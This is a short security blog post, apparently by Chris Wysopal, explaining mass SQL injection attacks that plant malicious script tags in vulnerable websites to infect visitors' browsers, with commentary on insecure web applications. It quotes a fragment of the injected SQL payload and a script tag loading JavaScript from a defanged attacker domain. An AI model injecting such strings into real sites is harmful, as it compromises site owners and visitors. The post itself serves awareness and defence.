And the results are not graceful.
Attackers have been finding web sites that have vulnerabilities in them that allow the modification of content on the web site. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field:
rtrim(convert(varchar(4000),['+@C+']))+”<script src=http://17gamo [dot] com/1.js></script>”’)FETCH NEXT FROM
<script src=http://17gamo [dot] com/1.js></script>
It Takes Two to Tango
This is an example of a vulnerability where it takes two to tango. Not only does it require a vulnerable client program connecting to untrusted data on the internet. To spread widely, it requires vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is there is no “safe” area of the internet to browse.
Something that concerns me is the organizations with the vulnerable web applications don’t know it or don’t care. They don’t have the brand damage of a large software company such as Microsoft so thousands of small vulnerable web apps keep serving up the latest and gratest malicious payloads for the latest client vulnerabilities. If it isn’t Internet Explorer, like this week, it might be Firefox or Flash or a media plug in.
Insecure web applications are helping the criminals win.
Written by: Chris Wysopal